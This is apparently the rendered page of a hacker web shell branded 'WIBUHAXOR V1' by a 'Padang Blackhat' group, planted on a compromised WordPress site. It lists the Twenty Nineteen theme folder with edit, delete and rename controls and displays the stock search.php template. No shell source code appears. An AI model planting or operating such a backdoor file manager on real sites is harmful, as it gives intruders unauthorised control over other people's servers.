-
WIBUHAX0R1337
-
/
home
/
coludnqa
/
public_html
/
wp-content
/
themes
/
twentynineteen
/
[ Home ]
Create Folder
Create File
Nama File / Folder
Size
Action
classes
--
NONE
fonts
--
NONE
images
--
NONE
inc
--
NONE
js
--
NONE
sass
--
NONE
template-parts
--
NONE
.htaccess
0.231KB
Edit File
Delete File
Rename
404.php
0.826KB
Edit File
Delete File
Rename
archive.php
1.213KB
Edit File
Delete File
Rename
comments.php
3.91KB
Edit File
Delete File
Rename
footer.php
1.584KB
Edit File
Delete File
Rename
functions.php
10.997KB
Edit File
Delete File
Rename
header.php
1.84KB
Edit File
Delete File
Rename
image.php
2.813KB
Edit File
Delete File
Rename
index.php
1.041KB
Edit File
Delete File
Rename
package-lock.json
109.252KB
Edit File
Delete File
Rename
package.json
1.449KB
Edit File
Delete File
Rename
page.php
0.748KB
Edit File
Delete File
Rename
postcss.config.js
0.214KB
Edit File
Delete File
Rename
print.css
3.856KB
Edit File
Delete File
Rename
readme.txt
3.996KB
Edit File
Delete File
Rename
search.php
1.329KB
Edit File
Delete File
Rename
single.php
1.745KB
Edit File
Delete File
Rename
style-editor-customizer.css
0.155KB
Edit File
Delete File
Rename
style-editor-customizer.scss
0.154KB
Edit File
Delete File
Rename
style-editor.scss
18.14KB
Edit File
Delete File
Rename
style-rtl.css
220.613KB
Edit File
Delete File
Rename
style.css
220.801KB
Edit File
Delete File
Rename
style.scss
3.186KB
Edit File
Delete File
Rename
<?php /** * The template for displaying search results pages * * @link https://developer.wordpress.org/themes/basics/template-hierarchy/#search-result * * @package WordPress * @subpackage Twenty_Nineteen * @since Twenty Nineteen 1.0 */ get_header(); ?> <div id="primary" class="content-area"> <main id="main" class="site-main"> <?php if ( have_posts() ) : ?> <header class="page-header"> <h1 class="page-title"> <?php _e( 'Search results for: ', 'twentynineteen' ); ?> <span class="page-description"><?php echo get_search_query(); ?></span> </h1> </header><!-- .page-header --> <?php // Start the Loop. while ( have_posts() ) : the_post(); /* * Include the Post-Format-specific template for the content. * If you want to override this in a child theme, then include a file * called content-___.php (where ___ is the Post Format name) and that * will be used instead. */ get_template_part( 'template-parts/content/content', 'excerpt' ); // End the loop. endwhile; // Previous/next page navigation. twentynineteen_the_posts_navigation(); // If no content, include the "No posts found" template. else : get_template_part( 'template-parts/content/content', 'none' ); endif; ?> </main><!-- #main --> </div><!-- #primary --> <?php get_footer();
© 2022 - 2023 WIBUHAXOR V1 By Lutfifakee || Padang Blackhat